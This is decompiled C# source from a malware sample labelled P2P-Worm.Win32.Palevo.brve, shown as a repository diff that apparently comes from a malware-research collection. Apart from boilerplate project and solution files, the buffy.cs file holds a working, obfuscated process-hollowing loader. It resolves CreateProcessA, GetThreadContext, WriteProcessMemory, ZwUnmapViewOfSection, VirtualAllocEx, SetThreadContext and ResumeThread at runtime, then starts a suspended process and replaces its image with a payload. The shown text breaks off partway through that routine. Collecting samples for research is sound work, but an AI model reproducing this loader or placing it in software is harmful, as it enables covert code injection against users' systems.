ref IntPtr pimmStart,
ref long pdwBufferSize,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
ref long pdwNumEntries);
[DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MprAdminDeviceEnum(
ref IntPtr hMprServer,
long dwLevel,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
ref long lpdwTotalEntries);
[DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MsiDatabaseImport(
ref IntPtr hDatabase,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
[DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetReplExportDirSetInfo(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
ref long parm_err);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetUseGetInfo(
ref IntPtr UncServerName,
ref IntPtr UseName,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsoleInput(
long hConsoleInput,
ref IntPtr lpBuffer,
long nLength,
ref long lpNumberOfEventsRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
[DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SnmpMgrCtl(
ref IntPtr session,
long dwCtlCode,
ref long lpvInBuffer,
long cbInBuffer,
ref long lpvOUTBuffer,
long cbOUTBuffer,
ref long lpcbBytesReturned);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long AddAuditAccessAceEx(
IntPtr pAcl,
long dwAceRevision,
long AceFlags,
long dwAccessMask,
ref IntPtr pSid,
long bAuditSuccess,
long bAuditFailure);
[DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLInstallerError(
int iError,
ref long pfErrorCode,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
int cbErrorMsgMax,
ref int pcbErrorMsg);
[DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
[DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RasSetCredentials(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
ref IntPtr TLPRASCREDENTIALSA,
long @bool);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsole(
long hConsoleInput,
ref long lpBuffer,
long nNumberOfCharsToRead,
ref long lpNumberOfCharsRead,
ref long lpReserved);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadEncryptedFileRaw(
ref IntPtr pfExportCallback,
ref long pvCallbackContext,
ref long pvContext);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadPrinter(
long hPrinter,
ref long pBuf,
long cdBuf,
ref long pNoBytesRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReleaseSemaphore(
long hSemaphore,
long lReleaseCount,
ref long lpPreviousCount);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
[DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetStringTypeEx(
long Locale,
long dwInfoType,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
long cchSrc,
ref int lpCharType);
[DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetVolumePathName(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
long cchBufferLength);
[DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr ToAscii(
long uVirtKey,
long uScanCode,
ref byte lpbKeyState,
ref long lpwTransKey,
long fuState);
private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
public struct Context
{
public uint II69TOHMUR;
public uint d2;
public uint das;
public uint d9;
public uint ad;
public uint dsa;
public uint ds;
public buffy.Save Save;
public uint dh;
public uint sad;
public uint da;
public uint MD;
public uint RD;
public uint mSI;
public uint WDA;
public uint AD3;
public uint D21;
public uint AS4;
public uint K32;
public uint F2W;
public uint HHJ;
public uint ADF5;
public uint GSSA;
public uint DSAAA;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] er6rgdr65;
}
public struct Save
{
public uint KD7JX2MXT;
public uint JCNS3ZPSXO;
public uint DAS3;
public uint DAS23;
public uint ADSA;
public uint DAF35;
public uint FA32D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] FSDRF43;
public uint FA32QA;
}
public struct Misc
{
public uint SDUHRL;
public uint GSIJ;
}
public struct Section_Header
{
public byte FSDPOU4PO3;
public buffy.Misc Mi2sc;
public uint AL8ZCRFWNU;
public uint DA22S3;
public uint PoinEEter;
public uint E2Q4RS;
public uint FS523QF;
public uint FSB43FSD4;
public uint QBFAS4E;
public uint AS32QFZS;
}
public struct Process_Information
{
public IntPtr DAS4QQW;
public IntPtr RFSER;
public int TGJWE;
public int SDFFFFFFFFFF;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct Startup_Information
{
public int CSZE;
public string FSDR4G;
public string AAAAAAAAAA;
public string AADDDDDDD;
public int ADA;
public int C;
public int AEDS;
public int DASDDDD;
public int XASE4;
public int DAS3EDFZ;
public int DVA3ES;
public int CCCCQ;
public short FDSRS;
public short VYE5X;
public int KHJKIHJK;
public int KHJKHJK;
public int KHJKHJ;
public int KHJKJHK;
}
public struct Security_Flags
{
public int GFSETWE;
public IntPtr EWEWWW;
public int DASDAS;
}
public struct DOS_Header
{
public ushort DASDASFASF;
public ushort QWEQWE;
public ushort EQWEQWEQWE;
public ushort HFGHFGHFGH;
public ushort HFGHFGHFG;
public ushort DASD444444;
public ushort DASFASE33;
public ushort DASKGHJ;
public ushort DASVZDF;
public ushort VXCVXC;
public ushort VXCVXCV;
public ushort EWECS;
public ushort EWADC;
public ushort UADA3;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservWWWWWWWWWWWWWWWedA;
public ushort DAS4E;
public ushort UJJ;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] DDDDDDDDD;
public int DASE3ASDAS;
}
public struct NT_Headers
{
public uint SSSSSSSSSSSQ;
public buffy.File_Header DSEEEEE;
public buffy.Optional_Headers OOOU;
}
public struct File_Header
{
public ushort ITTTTTTTT;
public ushort DAAAAAAAA3;
public uint HRFTYTYTR;
public uint GJGFSFS;
public uint FSVGY;
public ushort FSFV;
public ushort A34FFC;
}
public struct Optional_Headers
{
public ushort WWWWWWWWW;
public byte MaAAAAAAAAAAAjor;
public byte MiSSSSSSSSSSSnor;
public uint SSSSSSSSSSSSS;
public uint FFFFFFFFFFF;
public uint XXXXXXXX;
public uint DDDDDDDDAAA;
public uint FSSSSSSS;
public uint RSFS43;
public uint DFAZDASD;
public uint SectionA;
public uint FileA;
public ushort GDFTDFFFF;
public ushort HGDFHD564;
public ushort GD5ERGD;
public ushort FSD5YHD;
public ushort ASDASG;
public ushort AS4ASAS;
public uint CCC;
public uint DASRDASRASR;
public uint WQDASDASD;
public uint Assssssss;
public ushort fsd4s;
public ushort fjio;
public uint dasrlajstpoi;
public uint dasdraskyjhuasp;
public uint SHRedas4wa9uqserve;
public uint fsdtsysyt;
public uint eawdasdas3;
public uint Cocccunt;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public buffy.Data_Directory[] GSDGSDT4;
}
public struct Data_Directory
{
public uint ewq34q234;
public uint das34aw33;
}
public delegate bool GN04L0ER8I(
string ASFASE3,
string DASDAS3E2,
ref buffy.Security_Flags DASCASE,
ref buffy.Security_Flags CASE222,
bool DAS432E,
uint AEDFKJK32,
IntPtr DSA43R3W,
string ase32ew,
[In] ref buffy.Startup_Information das43fsa,
out buffy.Process_Information das3);
public delegate bool ZGOQ8VM05M(
IntPtr DASE32,
int AL8ZCRFWNU,
byte[] DSAE32,
int DASEADAS,
out int ASD43FA);
public delegate int Q7QRRP639W(
IntPtr FASFDASDAS,
int AL8ZCRFWNU,
ref int CAS32,
int ASDASC,
ref int CASTWE);
public delegate IntPtr W6CTR6GLCC(
IntPtr DASE43E,
int AL8ZCRFWNU,
uint DASCAS3,
uint DAS3,
uint DAS32);
public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
public delegate uint WS2XVBNVO9(IntPtr DASEAS);
public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/pizde.cs
+645
View File
File diff suppressed because one or more lines are too long
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/P2P-Worm.Win32.Palevo.brve.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>cfncfn</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="pizde.cs" />
<Compile Include="buffy.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/P2P-Worm.Win32.Palevo.brve.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "cfncfn", "P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.csproj", "{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Debug|Any CPU.Build.0 = Debug|Any CPU
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Release|Any CPU.ActiveCfg = Release|Any CPU
{5A72DCE4-9543-418F-9760-A3D7D1B53FDF}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/buffy.cs
+632
View File
@@ -0,0 +1,632 @@
// Decompiled with JetBrains decompiler
// Type: buffy
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
public class buffy
{
public const long ASDFASFASF = 2778;
public const long FASFASFASF = 60116;
public const long AFSFASFASCFC = 218;
public const long ASDASCASDASD = 218;
public const long BVCXBXCBXCB = 218;
public const long BXCBXCBXCB = 253;
public const long FSDR3FSF = 218;
public const long KKKKKKKKKDDDDDDD = 17247;
public const uint FSSSSSSSSSSSSSSSSSS = 218;
public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
{
object Instance1 = (object) new buffy.Context();
object obj1 = (object) new buffy.Process_Information();
object obj2 = (object) new buffy.Startup_Information();
object obj3 = (object) new buffy.Security_Flags();
object obj4 = (object) new buffy.Security_Flags();
object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
Type Type = typeof (Marshal);
object[] objArray1 = new object[2];
object[] objArray2 = objArray1;
object Instance3 = Instance2;
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
objArray2[0] = objectValue;
objArray1[1] = (object) dosHeader1.GetType();
object[] objArray3 = objArray1;
object[] Arguments = objArray3;
bool[] flagArray = new bool[2]{ true, false };
bool[] CopyBack = flagArray;
object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
if (flagArray[0])
NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
{
RuntimeHelpers.GetObjectValue(objArray3[0])
}, (string[]) null, (Type[]) null, true, false);
buffy.DOS_Header dosHeader2;
buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
string DASDAS3E2_1 = VVVVVVCAE;
object obj6 = obj3;
buffy.Security_Flags securityFlags1;
buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
ref buffy.Security_Flags local1 = ref securityFlags2;
object obj7 = obj4;
buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
ref buffy.Security_Flags local2 = ref securityFlags3;
IntPtr num1;
IntPtr DSA43R3W1 = num1;
object obj8 = obj2;
buffy.Startup_Information startupInformation1;
buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
ref buffy.Startup_Information local3 = ref startupInformation2;
object obj9 = obj1;
buffy.Process_Information processInformation1;
buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
ref buffy.Process_Information local4 = ref processInformation2;
int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
object obj10 = (object) processInformation2;
object Instance4 = (object) startupInformation2;
object obj11 = (object) securityFlags3;
object obj12 = (object) securityFlags2;
if (-((uint) num2 > 0U ? 1 : 0) == 0)
return;
buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
buffy.NT_Headers ntHeaders2;
buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
{
(object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
}, (string[]) null, (Type[]) null);
NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
{
(object) 65539
}, (string[]) null, (Type[]) null);
if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
return;
buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
string DASDAS3E2_2 = VVVVVVCAE;
object obj13 = obj12;
securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
ref buffy.Security_Flags local5 = ref securityFlags2;
object obj14 = obj11;
securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
ref buffy.Security_Flags local6 = ref securityFlags3;
IntPtr DSA43R3W2 = num1;
object obj15 = Instance4;
startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
ref buffy.Startup_Information local7 = ref startupInformation2;
object obj16 = obj10;
processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
ref buffy.Process_Information local8 = ref processInformation2;
int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
object Instance5 = (object) processInformation2;
object obj17 = (object) startupInformation2;
object obj18 = (object) securityFlags3;
object obj19 = (object) securityFlags2;
if (-((uint) num3 > 0U ? 1 : 0) == 0)
return;
buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
object obj21 = Instance1;
buffy.Context context1;
buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
ref buffy.Context local9 = ref context2;
int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
object Instance6 = (object) context2;
buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
long num5;
int num6 = checked ((int) num5);
ref int local10 = ref num6;
int num7 = 0;
ref int local11 = ref num7;
int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
long num9 = (long) num6;
buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
int AL8ZCRFWNU1 = checked ((int) num9);
long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
